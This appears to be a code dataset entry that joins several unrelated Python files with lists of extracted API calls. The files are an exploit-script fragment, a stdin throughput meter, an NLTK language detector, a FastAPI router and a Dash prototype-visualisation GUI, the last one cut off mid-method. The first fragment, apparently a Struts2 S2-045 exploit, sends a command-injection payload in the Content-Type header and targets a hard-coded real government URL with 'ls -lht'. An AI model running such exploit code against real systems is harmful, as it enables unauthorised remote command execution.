            headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
            request = urllib.Request(url, headers=headers)
            page = urllib.urlopen(request).read()
        except http.client.IncompleteRead as e:
            # Partial responses still carry (truncated) command output.
            page = e.partial
        print(page)
        return page
if __name__ == '__main__':
    s=Structs2_45()
    # Hard-coded demo target; run only against systems you are explicitly
    # authorized to test.
    url="http://www.ly.gov.tw/innerIndex.action"
    if s.validate(url):
        s.exploit(url,'ls -lht')
"urllib.urlopen",
"requests.get",
"urllib.Request"
] | [((947, 981), 'requests.get', 'requests.get', (['url'], {'headers': 'headers'}), '(url, headers=headers)\n', (959, 981), False, 'import requests\n'), ((2539, 2575), 'urllib.Request', 'urllib.Request', (['url'], {'headers': 'headers'}), '(url, headers=headers)\n', (2553, 2575), False, 'import urllib\n'), ((2595, 2618), 'urllib.urlopen', 'urllib.urlopen', (['request'], {}), '(request)\n', (2609, 2618), False, 'import urllib\n')] |
#!/usr/bin/env python3
'''
Continuously reads data on stdin until there is no more data. Records how many
bytes there were and how long it took to read them. Prints this information.
'''
import time
import sys
import threading
# Serializes writes to stderr between the main thread and the timer thread.
write_lock = threading.Lock()
# Set by the timer thread once it has observed the stop event, so the main
# thread can wait for the final per-second report before printing totals.
thread_done = threading.Event()
def report(stop_ev, start_time, last_byte_count):
    """Print bytes/throughput for the last interval, then re-arm itself.

    Runs on a threading.Timer thread once per second until *stop_ev* is set.
    NOTE(review): byte_count is read here without holding a lock; for a
    human-readable stats display the occasional stale read is benign.
    """
    if stop_ev.is_set():
        thread_done.set()
        return
    global byte_count
    b = byte_count - last_byte_count
    t = time.time() - start_time
    # bytes -> megabits per second
    r = b / t * 8 / 1000 / 1000
    with write_lock:
        print(
            '%d bytes in %f seconds (%0.2f Mbps)' % (b, t, r),
            file=sys.stderr)
    # Schedule the next one-second report, snapshotting the current totals.
    threading.Timer(1, report, [stop_ev, time.time(), byte_count]).start()
# Don't record the start time until we've read the first byte
fd = open('/dev/stdin', 'rb')
fd.read(1)
byte_count = 1
stop_ev = threading.Event()
threading.Timer(1, report, [stop_ev, time.time(), byte_count]).start()
start = time.time()
# Keep reading until no more data
data = 'foo'
try:
    while data:
        data = fd.read(4096)
        byte_count += len(data)
except KeyboardInterrupt:
    # print('')
    pass
finally:
    # Stop the reporter thread and wait for it to acknowledge before the
    # final summary is printed.
    stop_ev.set()
    thread_done.wait()
# Print stats
end = time.time()
duration = end - start
rate = byte_count / duration * 8 / 1000 / 1000
with write_lock:
    print('OVERALL: %d bytes in %0.2f seconds (%0.2f Mbps)' %\
        (byte_count, duration, rate), file=sys.stderr)
sys.stderr.flush()
fd.close()
| [
"threading.Event",
"threading.Lock",
"sys.stderr.flush",
"time.time"
] | [((241, 257), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (255, 257), False, 'import threading\n'), ((272, 289), 'threading.Event', 'threading.Event', ([], {}), '()\n', (287, 289), False, 'import threading\n'), ((863, 880), 'threading.Event', 'threading.Event', ([], {}), '()\n', (878, 880), False, 'import threading\n'), ((960, 971), 'time.time', 'time.time', ([], {}), '()\n', (969, 971), False, 'import time\n'), ((1218, 1229), 'time.time', 'time.time', ([], {}), '()\n', (1227, 1229), False, 'import time\n'), ((1435, 1453), 'sys.stderr.flush', 'sys.stderr.flush', ([], {}), '()\n', (1451, 1453), False, 'import sys\n'), ((474, 485), 'time.time', 'time.time', ([], {}), '()\n', (483, 485), False, 'import time\n'), ((918, 929), 'time.time', 'time.time', ([], {}), '()\n', (927, 929), False, 'import time\n'), ((700, 711), 'time.time', 'time.time', ([], {}), '()\n', (709, 711), False, 'import time\n')] |
# -*- coding: utf-8 -*-
# Aufgaben 6, 7, 20, 21, 24, 30, 34, 39, 38, 41, 43 <NAME>
# -----------------
# 43 detect language
# -----------------
import nltk, re
from nltk import word_tokenize
languages = ['Chickasaw', 'English', 'German_Deutsch', 'Greenlandic_Inuktikut', 'Hungarian_Magyar', 'Ibibio_Efik']
def word_frequency(text):
    """Build a case-insensitive word-frequency distribution for *text*.

    :param text: either a raw string (tokenized with nltk.word_tokenize) or
        an already-tokenized iterable of words.
    :return: an ``nltk.FreqDist`` mapping lowercased token -> count.
    """
    tokens = text
    # isinstance() is the idiomatic, subclass-safe type check
    # (original compared type(text) == type(str(''))).
    if isinstance(text, str):
        tokens = word_tokenize(text)
    freq = nltk.FreqDist(w.lower() for w in tokens)
    return freq
def get_lang_list():
    """Map each language in ``languages`` to its UDHR reference vocabulary.

    For every language, the Universal Declaration of Human Rights corpus is
    tokenized and ranked by frequency; tokens containing at least one word
    character are kept (punctuation-only tokens are dropped).

    :return: dict of language name -> list of word tokens, most frequent first.
    """
    reference_vocab = {}
    for lang in languages:
        corpus_tokens = nltk.corpus.udhr.words(lang + '-Latin1')
        ranked = word_frequency(corpus_tokens).most_common()
        reference_vocab[lang] = [tok for tok, _count in ranked
                                 if re.findall(r'\w', tok)]
    return reference_vocab
def which_lang(string):
    """Guess which of the reference languages *string* is written in.

    The input is tokenized and compared against each language's UDHR
    vocabulary; the language sharing the most word types wins.

    :param string: text to classify.
    :return: a sentence naming the detected language.
    """
    ranked = word_frequency(string).most_common()
    input_words = {tok for tok, _count in ranked if re.findall(r'\w', tok)}
    reference = get_lang_list()
    # Number of shared word types per candidate language.
    overlap = {lang: len(input_words & set(reference[lang]))
               for lang in languages}
    best_match = max(overlap, key=overlap.get)
    return 'Your Text is written in "{}"'.format(best_match)
# Demo inputs: one German and one English filler paragraph used to exercise
# the detector from the command line.
input_txt = {
    'german': 'Auch gibt es niemanden, der den Schmerz an sich liebt, sucht oder wünscht, nur, weil er Schmerz ist, es sei denn, es kommt zu zufälligen Umständen, in denen Mühen und Schmerz ihm große Freude bereiten können. Um ein triviales Beispiel zu nehmen, wer von uns unterzieht sich je anstrengender körperlicher Betätigung, außer um Vorteile daraus zu ziehen? Aber wer hat irgend ein Recht, einen Menschen zu tadeln, der die Entscheidung trifft, eine Freude zu genießen, die keine unangenehmen Folgen hat, oder einen, der Schmerz vermeidet, welcher keine daraus resultierende Freude nach sich zieht? Auch gibt es niemanden, der den Schmerz an sich liebt, sucht oder wünscht, nur, weil er Schmerz ist, es sei denn, es kommt zu zufälligen Umständen, in denen Mühen und Schmerz ihm große Freude bereiten können. Um ein triviales Beispiel zu nehmen, wer von uns unterzieht sich je anstrengender körperlicher Betätigung, außer um Vorteile daraus zu ziehen?',
    'english': 'A wonderful serenity has taken possession of my entire soul, like these sweet mornings of spring which I enjoy with my whole heart. I am alone, and feel the charm of existence in this spot, which was created for the bliss of souls like mine. I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment; and yet I feel that I never was a greater artist than now. When, while the lovely valley teems with vapour around me, and the meridian sun strikes the upper surface of the impenetrable foliage of my trees, and but a few stray gleams steal into the inner sanctuary, I throw myself down among the tall grass by the trickling stream; and, as I lie close to the earth, a thousand unknown plants are noticed by me.'
}
print(which_lang(input_txt['english']))
| [
"nltk.corpus.udhr.words",
"re.findall",
"nltk.word_tokenize"
] | [((407, 426), 'nltk.word_tokenize', 'word_tokenize', (['text'], {}), '(text)\n', (420, 426), False, 'from nltk import word_tokenize\n'), ((597, 641), 'nltk.corpus.udhr.words', 'nltk.corpus.udhr.words', (["(language + '-Latin1')"], {}), "(language + '-Latin1')\n", (619, 641), False, 'import nltk, re\n'), ((976, 1002), 're.findall', 're.findall', (['"""\\\\w"""', 'word[0]'], {}), "('\\\\w', word[0])\n", (986, 1002), False, 'import nltk, re\n'), ((785, 811), 're.findall', 're.findall', (['"""\\\\w"""', 'word[0]'], {}), "('\\\\w', word[0])\n", (795, 811), False, 'import nltk, re\n')] |
from fastapi import APIRouter, Request
from starlette.status import HTTP_200_OK
from deciphon_api.api import dbs, hmms, jobs, prods, scans, sched, seqs
from deciphon_api.core.responses import PrettyJSONResponse
# Top-level API router aggregating every sub-resource router of the service.
router = APIRouter()
router.include_router(dbs.router)
router.include_router(hmms.router)
router.include_router(jobs.router)
router.include_router(prods.router)
router.include_router(scans.router)
router.include_router(sched.router)
router.include_router(seqs.router)
@router.get(
    "/",
    summary="list of all endpoints",
    response_class=PrettyJSONResponse,
    status_code=HTTP_200_OK,
    name="root:list-of-endpoints",
)
def root(request: Request):
    """Return a pretty-printed JSON map of route name -> path for every
    registered endpoint, sorted alphabetically by route name."""
    routes = sorted(request.app.routes, key=lambda x: x.name)
    urls = {route.name: route.path for route in routes}
    return PrettyJSONResponse(urls)
| [
"fastapi.APIRouter",
"deciphon_api.core.responses.PrettyJSONResponse"
] | [((222, 233), 'fastapi.APIRouter', 'APIRouter', ([], {}), '()\n', (231, 233), False, 'from fastapi import APIRouter, Request\n'), ((805, 829), 'deciphon_api.core.responses.PrettyJSONResponse', 'PrettyJSONResponse', (['urls'], {}), '(urls)\n', (823, 829), False, 'from deciphon_api.core.responses import PrettyJSONResponse\n')] |
import numpy as np
from io import BytesIO
import wave
import struct
from dcase_models.util.gui import encode_audio
#from .utils import save_model_weights,save_model_json, get_data_train, get_data_test
#from .utils import init_model, evaluate_model, load_scaler, save, load
#from .model import debugg_model, prototype_loss,prototypeCNN_maxpool
#from .prototypes import Prototypes
import os
from keras.callbacks import ModelCheckpoint,CSVLogger
from keras.optimizers import Adam
import keras.backend as K
import dash
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_core_components as dcc
import dash_audio_components
import plotly.graph_objects as go
import plotly.express as px
from plotly.subplots import make_subplots
import librosa
import sys
from dcase_models.util.files import save_pickle, load_pickle
from dcase_models.util.data import get_fold_val
#from dcase_models.model.model import debugg_model, modelAPNet
# Default matplotlib/plotly category palette (10 colours, cycled with j % 10).
colors = ['#1f77b4',
          '#ff7f0e',
          '#2ca02c',
          '#d62728',
          '#9467bd',
          '#8c564b',
          '#e377c2',
          '#7f7f7f',
          '#bcbd22',
          '#17becf']
# UrbanSound8K class names (full, HTML line-broken, and abbreviated variants
# used for different axis-label widths).
class_names = (['air conditioner', 'car horn', 'children playing',
                'dog bark', 'drilling', 'engine idling', 'gun shot',
                'jack- hammer', 'siren', 'street music'])
class_names2 = (['air<br>conditioner', 'car<br>horn', 'children<br>playing',
                 'dog<br>bark', 'drilling', 'engine<br>idling', 'gun<br>shot',
                 'jack-<br>hammer', 'siren', 'street<br>music'])
class_names_av = ['AC', 'CH', 'CP', 'DB', 'DR', 'EI', 'GS', 'JA', 'SI', 'SM']
#from audio_prototypes.utils import load_training_log
from shutil import copyfile
import matplotlib.pyplot as plt
# Colormap used to render mel-spectrograms as RGBA images.
cm = plt.get_cmap('viridis')
def generate_figure2D(model_container, selectedpoints=None,
                      x_select=0, y_select=1, samples_per_class=10,
                      label_list=None):
    """Scatter plot of prototypes (crosses) and data instances (dots) in a
    2D (PCA) projection, one pair of traces per class.

    Parameters
    ----------
    model_container : object exposing ``prototypes`` and ``data_instances``,
        each with a ``get_all_instances()`` method (project type).
    selectedpoints : optional list of *global* prototype indices to highlight.
    x_select, y_select : which PCA components go on the x / y axes (0-3).
    samples_per_class : max number of data instances drawn per class.
    label_list : class display names. Falls back to the module-level
        ``class_names`` when empty/None — the previous default (``[]``)
        raised IndexError at ``proto_list[j]``.

    Returns
    -------
    plotly.graph_objects.Figure
    """
    # Avoid mutable default arguments and make the empty-label case usable.
    if selectedpoints is None:
        selectedpoints = []
    if not label_list:
        label_list = class_names
    n_classes = len(label_list)

    (prototypes_feat, prototypes_mel, protoypes2D,
     prototypes_classes, _) = model_container.prototypes.get_all_instances()
    prototype_ixs = np.arange(0, len(prototypes_feat))

    # Group prototype coordinates (and their global indices) by class.
    x = []
    y = []
    classes = []
    prototypes_ixs = []
    for class_ix in range(n_classes):
        mask = prototypes_classes == class_ix
        protos_2d = protoypes2D[mask]
        proto_ids = prototype_ixs[mask]
        x.append([protos_2d[j, x_select] for j in range(len(protos_2d))])
        y.append([protos_2d[j, y_select] for j in range(len(protos_2d))])
        classes.append(['prototype' + str(ix) for ix in proto_ids])
        prototypes_ixs.append(proto_ids)

    (centers_feat, centers_mel, centers2D, centers_classes,
     centers_audio, centers_file_names) = model_container.data_instances.get_all_instances()
    centers_ixs = np.arange(0, len(centers2D))

    # Same grouping for the data instances ("centers").
    x_centers = []
    y_centers = []
    classes_centers = []
    for class_ix in range(n_classes):
        mask = centers_classes == class_ix
        cents_2d = centers2D[mask]
        cent_ids = centers_ixs[mask]
        x_centers.append([cents_2d[j, x_select] for j in range(len(cents_2d))])
        y_centers.append([cents_2d[j, y_select] for j in range(len(cents_2d))])
        classes_centers.append(['center' + str(ix) for ix in cent_ids])

    fig = make_subplots(rows=1, cols=1)
    size = 10
    proto_list = [label + ' (protos.)' for label in label_list]
    for j in range(n_classes):
        s = min(samples_per_class, len(x_centers[j]))
        # Translate globally-selected prototype indices into per-trace
        # positions (plotly's selectedpoints are indices within the trace).
        selectedpoints_j = None
        if len(selectedpoints) > 0:
            proto_ixs = prototypes_ixs[j]
            selectedpoints_j = []
            for point in selectedpoints:
                if point in proto_ixs:
                    point_i = [i for i, ix in enumerate(proto_ixs) if point == ix][0]
                    selectedpoints_j.append(point_i)
        fig.add_trace(
            go.Scatter(
                x=x[j], y=y[j], text=classes[j], name=proto_list[j],
                mode='markers', selectedpoints=selectedpoints_j,
                marker={'size': size, 'symbol': 'cross', 'color': colors[j % 10]}),
            row=1, col=1
        )
        fig.add_trace(
            go.Scatter(
                x=x_centers[j][:s], y=y_centers[j][:s],
                text=classes_centers[j][:s], name=label_list[j],
                selectedpoints=None, mode='markers',
                marker={'size': 5, 'color': colors[j % 10], 'opacity': 0.6}),
            row=1, col=1
        )

    components_dict = {0: 'First', 1: 'Second', 2: 'Third', 3: 'Fourth'}
    fig.update_layout(
        title="Prototypes and data instances in the 2D space (PCA)",
        xaxis_title=components_dict[x_select] + " principal component (x)",
        yaxis_title=components_dict[y_select] + " principal component (y)",
        clickmode='event+select',
        uirevision=True,
        width=1000,
        height=600,
    )
    return fig
def generate_figure_weights(model_container, selected=None, label_list=class_names):
    """Heatmap of the last fully-connected layer's weights (prototypes x classes).

    :param model_container: object exposing ``prototypes.W_dense`` (weight
        matrix) and ``prototypes.get_all_instances()`` (project type).
    :param selected: optional prototype x-position to mark with a scatter point.
    :param label_list: class names used as tick labels on both axes.
    :return: plotly Figure.
    """
    fig_weights = go.Figure(
        px.imshow(model_container.prototypes.W_dense.T,origin='lower'),
        layout=go.Layout(title=go.layout.Title(text="A Bar Chart"))
    )
    # Hide the colour bar of the heatmap trace.
    fig_weights.update_traces(dict( showscale=False, colorbar_len=0.1,
                 coloraxis=None), selector={'type':'heatmap'})
    #fig_weights.update_traces(showscale=False)
    fig_weights.update_layout(clickmode='event+select')
    if selected is not None:
        fig_weights.add_trace(go.Scatter(x=[selected],y=[1]))
    _,_,_,prototypes_classes,_ = model_container.prototypes.get_all_instances()
    # Place one x tick at the mean position of each class's prototypes.
    xticks = []
    for j in range(len(label_list)):
        tickj = np.mean(np.argwhere(np.array(prototypes_classes) == j))
        xticks.append(tickj)
    fig_weights.update_layout(
        title="Weights of the last fully-connected layer",
        xaxis_title="Prototypes",
        yaxis_title="Classes",
        #margin = {'l': 10, 'b': 10, 't': 10, 'r': 10},
        xaxis = dict(
            tickmode = 'array',
            tickvals = xticks,
            ticktext = label_list #class_names2
        ),
        yaxis = dict(
            tickmode = 'array',
            tickvals = [i for i in range(len(class_names))],
            ticktext = label_list #class_names
        ),
        width=1000,
        height=300,
    )
    return fig_weights
def generate_figure_mel(mel_spec):
    """Render a mel-spectrogram as a heatmap (time on x, mel bands on y).

    :param mel_spec: 2D array shaped (time, mel_bands); transposed for display.
    :return: plotly Figure with the colour bar hidden.
    """
    base_layout = go.Layout(title=go.layout.Title(text="A Bar Chart"))
    fig = go.Figure(px.imshow(mel_spec.T, origin='lower'), layout=base_layout)
    # Suppress the colour scale on the heatmap trace.
    fig.update_traces(dict(showscale=False, colorbar_len=0.1, coloraxis=None),
                      selector={'type': 'heatmap'})
    fig.update_layout(
        title="Mel-spectrogram",
        xaxis_title="Time (hops)",
        yaxis_title="Mel filter index",
        #margin = {'l': 0, 'b': 0, 't': 40, 'r': 10}
    )
    #fig.layout.coloraxis.showscale = False
    return fig
class GUI():
    def __init__(self, model_containers, data, folds_files, exp_folder_input, exp_folder_output, label_list, params, plot_label_list=None,graph=None):
        """Dash GUI for inspecting prototype models across cross-validation folds.

        :param model_containers: dict fold-name -> model container (project type).
        :param data: dataset object.
        :param folds_files: per-fold audio file lists.
        :param exp_folder_input/exp_folder_output: experiment I/O folders.
        :param label_list: class names.
        :param params: experiment parameter dict (e.g. params['train']['epochs']).
        :param plot_label_list: optional alternative names for plotting;
            defaults to label_list.
        :param graph: optional TensorFlow graph (set later in generate_layout
            when None).
        """
        self.model_containers = model_containers
        self.data = data
        self.folds_files = folds_files
        self.exp_folder_input = exp_folder_input
        self.exp_folder_output = exp_folder_output
        self.label_list = label_list
        self.params = params
        if plot_label_list is None:
            self.plot_label_list = label_list
        else:
            self.plot_label_list = plot_label_list
        self.graph = graph
        self.fold_list = list(model_containers.keys())
        # Start on the first fold; validation fold is derived from it.
        self.fold_test = self.fold_list[0]
        self.fold_val = get_fold_val(self.fold_test, self.fold_list)
        self.samples_per_class = 10
        # PCA components currently shown on x / y.
        self.x_select = 0
        self.y_select = 1
        # Last-seen click timestamps for the delete/reset/train buttons.
        self.click_timestamps = [0,0,0]
        self.generate_figure2D()
        self.generate_figure_weights()
    def generate_layout(self, app):
        """Build and install the Dash layout (plots, audio player, buttons,
        inputs and dropdowns) on *app*, and store the TF graph.

        :param app: a dash.Dash application instance; its ``layout`` is set
            as a side effect.
        """
        import tensorflow as tf
        # NOTE(review): external_stylesheets is built but never passed to the
        # app here — presumably applied by the caller; confirm.
        external_stylesheets = [
            'https://codepen.io/chriddyp/pen/bWLwgP.css',
            {
                'href': 'https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css',
                'rel': 'stylesheet',
                'integrity': '<KEY>',
                'crossorigin': 'anonymous'
            } ]
        self.app = app
        self.graph = tf.get_default_graph()
        self.generate_figure2D()
        self.generate_figure_weights()
        # Main 2D scatter of prototypes / data instances.
        plot2D = dcc.Graph(id='plot2D', figure=self.figure,
                            style={"height" : "100%", "width" : "100%"})
        # Blank mel-spectrogram placeholder taken from the first instance.
        _,center_mel_blank,_,_,_,_ = self.model_containers[self.fold_test].data_instances.get_instance_by_index(0)
        plot_mel = dcc.Graph(id="plot_mel",
                        figure = self.generate_figure_mel(center_mel_blank),
                        style={"width": "70%", "display": "inline-block",'float':'left'}
                    )
        plot_weights = dcc.Graph(id="plot_weights",
                            figure = self.fig_weigths,
                            style={"width": "100%", "display": "inline-block"}
                        )
        audio = dash_audio_components.DashAudioComponents(id='audio-player', src="",
                                                            autoPlay=False, controls=True)
        # Action buttons; the delete button starts hidden until a point is selected.
        button_delete = html.Button('Delete prototype',id='delete_and_convert', className='button',n_clicks_timestamp=0,style={'display':'none','width':'70%'})
        button_eval = html.Button('Evaluate model',id='eval', className='button',n_clicks_timestamp=0,style={'width':'70%'})
        button_load = html.Button('Load best weigths',id='load_weigths', className='button',n_clicks_timestamp=0,style={'width':'70%'})
        button_train = html.Button('Train model',id='train', className='button',n_clicks_timestamp=0,style={'width':'70%'})
        button_reset = html.Button('Reset model',id='reset', className='button',n_clicks_timestamp=0,style={'width':'70%'})
        output_eval = html.Div(id='output_eval',style={'width':'20%'})
        output_text = html.Div(id='output_text')
        output_interval = html.Div(id='output_interval')
        # Training hyper-parameter inputs.
        input_epochs = dcc.Input(id="input_epochs", type="number", placeholder="epochs",min=1, max=100, step=1,style={'width':'33%'})#,value=10)
        input_lr = dcc.Input(id="learning_rate", type="number", placeholder="learning_rate",min=0.0000001, max=1,style={'width':'33%'})
        input_bs = dcc.Input(id="batch_size", type="number", placeholder="batch_size",min=32, max=512, step=32,style={'width':'33%'})#,value=64)
        slider_samples = html.Div(dcc.Slider(id='samples_per_class',min=1,max=500, step=1,value=10,vertical=False),style={'width':'100%'})
        interval = dcc.Interval(id='interval-component', interval=1*1000, # in milliseconds
                            n_intervals=0)
        # Fold selector populated from the available CV folds.
        options = []
        for fold in self.fold_list:
            option = {'value': fold, 'label': fold}
            options.append(option)
        fold_select = dcc.Dropdown(id='fold_select',options=options,value=self.fold_test,style={'width':'85%'})
        #model_select = dcc.Dropdown(id='model_select',options=available_models,value=model_input_name,style={'width':'85%'})
        #input_model_output = dcc.Input(id="input_model_output", type="text", placeholder="model output",style={'width':'70%'},value=model_output_name)#,value=64)
        # PCA component selectors (components 1-4).
        options = []
        for j in range(4):
            options.append({'label':'component '+str(j+1),'value':j})
        x_select = dcc.Dropdown(id='x_select',options=options,value=0,style={'width': '80%'})
        y_select = dcc.Dropdown(id='y_select',options=options,value=1,style={'width': '80%'})
        eval_div = html.Div([button_eval,output_eval],style={'columnCount': 2,'width':'50%'})
        train_div = html.Div([input_epochs,input_lr,input_bs],style={'width':'70%'})#,style={'columnCount': 4,'width':'80%'})
        model_div = html.Div([fold_select],style={'columnCount': 3,'width':'80%'})
        model_prop_div = html.Div([button_load,button_reset],style={'columnCount': 2,'width':'50%'})
        #self.app.layout = html.Div([ html.Div([plot_mel, graph2,plot_weights ], className="nine columns",style={'height':'80vh'}) ])
        # Three rows: selectors, main plot + side panel, weights heatmap.
        self.app.layout = html.Div([
            html.Div([
                html.Div([x_select], className="two columns",style={'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}),
                html.Div([y_select], className="two columns",style={'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}),
                html.Div([slider_samples], className="three columns",style={'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}),
            ], className="row", style={'height':'10vh'}),
            html.Div([
                #html.Div([slider_samples], className="one column"),
                html.Div([plot2D], className="nine columns",style={'height':'80vh'}),
                html.Div([plot_mel,html.Br(),audio,html.Br(),button_delete,html.Br(),button_eval,html.Br(),output_eval,html.Br(),button_load,html.Br(),
                          button_reset,html.Br(),button_train,html.Br(),train_div,html.Br(),
                          html.Br(),fold_select, #model_select,input_model_output
                          html.Br(),html.Br(),output_text,interval], className="three columns"),
            ], className="row", style={'height':'80vh'}),
            # html.Div([
            #     html.Div([slider_samples], className="nine columns", style={'align':'center'})
            # ], className="row"),
            html.Div([
                # html.Div([], className="two columns"),
                html.Div([plot_weights], className="six columns"),
                #html.Div([graph_log], className="six columns")
            ], className="row", style={'height':'30vh'})
        ])
    def generate_figure2D(self,selectedpoints=[]):
        """Build (and cache in ``self.figure``) the 2D scatter of prototypes
        and data instances for the current test fold.

        :param selectedpoints: global prototype indices to highlight.
            NOTE(review): mutable default argument — harmless here because it
            is never mutated, but fragile.
        :return: plotly Figure (also stored as self.figure).
        """
        prototypes_feat,prototypes_mel,protoypes2D,prototypes_classes,_ = self.model_containers[self.fold_test].prototypes.get_all_instances()
        prototype_ixs = np.arange(0,len(prototypes_feat))
        # Group prototype coordinates by class (hard-coded 10 classes).
        x = []
        y = []
        classes = []
        classes_ix = []
        prototypes_ixs = []
        for class_ix in range(10):
            prototypes_class_ix = protoypes2D[prototypes_classes == class_ix]
            prototype_ixs_class = prototype_ixs[prototypes_classes == class_ix]
            xj = []
            yj = []
            classesj = []
            for j in range(len(prototypes_class_ix)):
                xj.append(prototypes_class_ix[j,self.x_select])
                yj.append(prototypes_class_ix[j,self.y_select])
                classesj.append('prototype'+str(prototype_ixs_class[j]))
            #    classes_ix.append(int(prototypes_classes[j]))
            x.append(xj)
            y.append(yj)
            classes.append(classesj)
            prototypes_ixs.append(prototype_ixs_class)
        centers_feat,centers_mel,centers2D,centers_classes,centers_audio,centers_file_names = self.model_containers[self.fold_test].data_instances.get_all_instances()
        centers_ixs = np.arange(0,len(centers2D))
        # Same per-class grouping for data instances ("centers").
        x_centers = []
        y_centers = []
        classes_centers = []
        classes_ix_centers = []
        ### Add this to tests. Delete!!!
        #centers2D = self.model_containers[self.fold_test].data_instances.X_feat_2D['X']#self.X_2D[self.fold_test]['X']
        #centers_classes = self.model_containers[self.fold_test].data_instances.X_feat_2D['Y']
        #centers_ixs = np.arange(0,len(centers2D))
        for class_ix in range(10):
            centers_class_ix = centers2D[centers_classes == class_ix]
            centers_ixs_class = centers_ixs[centers_classes == class_ix]
            xj = []
            yj = []
            classesj = []
            for j in range(len(centers_class_ix)):
                xj.append(centers_class_ix[j,self.x_select])
                yj.append(centers_class_ix[j,self.y_select])
                classesj.append('center'+str(centers_ixs_class[j]))
            #    classes_ix.append(int(prototypes_classes[j]))
            x_centers.append(xj)
            y_centers.append(yj)
            classes_centers.append(classesj)
        fig = make_subplots(rows=1, cols=1)#, column_widths=[0.8, 0.2])
        size = 12
        for j in range(10):
            # Cap the number of plotted instances per class.
            s = min(self.samples_per_class,len(x_centers[j]))
            print(s,self.samples_per_class,len(x_centers[j]))
            if len(selectedpoints) == 0:
                fig.add_trace(go.Scatter(x=x[j], y=y[j],text=classes[j], name=self.label_list[j],mode='markers',marker={'size': size, 'symbol':'cross', 'color':colors[j]}), row=1, col=1)
                fig.add_trace(go.Scatter(x=x_centers[j][:s], y=y_centers[j][:s],text=classes_centers[j][:s], name=self.label_list[j],mode='markers',marker={'size': 6,'color':colors[j],'opacity':0.7}), row=1, col=1)
            else:
                # Map global prototype indices to per-trace positions so
                # plotly highlights the right markers.
                proto_ixs = prototypes_ixs[j]
                selectedpoints_j = []
                for point in selectedpoints:
                    if point in proto_ixs:
                        print(point,proto_ixs)
                        point_i = [i for i,x in enumerate(proto_ixs) if point == x][0]
                        selectedpoints_j.append(point_i)
                fig.add_trace(go.Scatter(x=x[j], y=y[j],text=classes[j], name=self.label_list[j],mode='markers',selectedpoints=selectedpoints_j,marker={'size': size, 'symbol':'cross', 'color':colors[j]}), row=1, col=1)
                fig.add_trace(go.Scatter(x=x_centers[j][:s], y=y_centers[j][:s],text=classes_centers[j][:s], name=self.label_list[j],selectedpoints=[],mode='markers',marker={'size': 6,'color':colors[j],'opacity':0.7}), row=1, col=1)
        fig.update_layout()
        components_dict = {0: 'First', 1: 'Second', 2: 'Third', 3: 'Fourth'}
        fig.update_layout(
            title="Prototypes and k-means centers in the 2D space (PCA)",
            xaxis_title=components_dict[self.x_select] + " principal component (x)",
            yaxis_title=components_dict[self.y_select] + " principal component (y)",
            clickmode='event+select',uirevision=True
        )
        self.figure = fig
        return fig
    def generate_figure_training(self):
        """Build (and cache) the validation-accuracy-vs-epochs figure.

        NOTE(review): relies on ``self.weights_folder``, ``self.model_output_name``
        and ``self.training_logs``, which are not set in ``__init__`` as shown
        here, and on ``load_training_log``, whose import is commented out at
        module level — confirm these are provided elsewhere.

        :return: plotly Figure (also stored as self.figure_training).
        """
        data = []
        weights_folder = os.path.join(self.weights_folder, self.model_output_name)
        if len(self.training_logs) > 0:
            for j,training_log in enumerate(self.training_logs[self.fold_test]):
                #print(training_log)
                epochs,val_acc,name = training_log['epochs'],training_log['val_acc'],training_log['name']
                # A run still in progress re-reads its log from disk.
                if training_log['training'] == True:
                    epochs, val_acc = load_training_log(weights_folder,self.fold_test,row_ix=11)
                if len(epochs) > 0:
                    # Best accuracy observed so far, drawn as a horizontal line.
                    best = 0
                    for val in val_acc:
                        if float(val)>best:
                            best = float(val)
                    data.append({'x':epochs,'y': val_acc,'name': name,'mode': 'markers','marker': {'size': 8, 'color': colors[j]}}) #'val_acc_'+
                    data.append({'x':[epochs[0],epochs[-1]],'y': [best,best],'name': 'best_'+name,'mode': 'lines','marker': {'color': colors[j]}}) #'best_val_acc_'+
            self.figure_training = go.Figure(data=data)
            self.figure_training.update_layout(
                title="Accuracy on the validation set",
                xaxis_title="Accuracy",
                yaxis_title="Number of epochs",
                clickmode= 'event+select',uirevision=True
            )
        else:
            # No logs yet: show an empty placeholder with the same layout.
            self.figure_training = go.Figure(data={'x':[0],'y': [0]})
            self.figure_training.update_layout(
                title="Accuracy on the validation set",
                xaxis_title="Accuracy",
                yaxis_title="Number of epochs",
                clickmode= 'event+select',uirevision=True
            )
        return self.figure_training
    def generate_figure_weights(self,selected=None):
        """Build (and cache in ``self.fig_weigths``) the heatmap of the last
        dense layer's weights for the current test fold.

        :param selected: optional prototype x-position to mark with a scatter point.
        :return: plotly Figure.
        """
        fig_weigths = go.Figure(px.imshow(self.model_containers[self.fold_test].prototypes.W_dense.T,origin='lower'),layout=go.Layout(title=go.layout.Title(text="A Bar Chart")))
        fig_weigths.update_layout(clickmode='event+select')
        if selected is not None:
            fig_weigths.add_trace(go.Scatter(x=[selected],y=[1]))
        _,_,_,prototypes_classes,_ = self.model_containers[self.fold_test].prototypes.get_all_instances()
        # One x tick at the mean position of each class's prototypes.
        xticks = []
        for j in range(10):
            tickj = np.mean(np.argwhere(np.array(prototypes_classes) == j))
            xticks.append(tickj)
        self.fig_weigths = fig_weigths
        self.fig_weigths.update_layout(
            title="Weights of the last fully-connected layer",
            xaxis_title="Prototypes",
            yaxis_title="Classes",
            #margin = {'l': 0, 'b': 0, 't': 40, 'r': 10}
            xaxis = dict(
                tickmode = 'array',
                tickvals = xticks,
                ticktext = class_names2
            ),
            yaxis = dict(
                tickmode = 'array',
                tickvals = [i for i in range(len(class_names))],
                ticktext = class_names
            )
        )
        return fig_weigths
def generate_figure_mel(self,mel_spec):
figure = go.Figure(px.imshow(mel_spec.T,origin='lower'),layout=go.Layout(title=go.layout.Title(text="A Bar Chart")))
figure.update_layout(
title="Mel-spectrogram",
xaxis_title="Time (hops)",
yaxis_title="Mel filter index",
#margin = {'l': 0, 'b': 0, 't': 40, 'r': 10}
)
#figure.layout.coloraxis.showscale = False
return figure
    def add_mel_to_figure(self,hoverData):
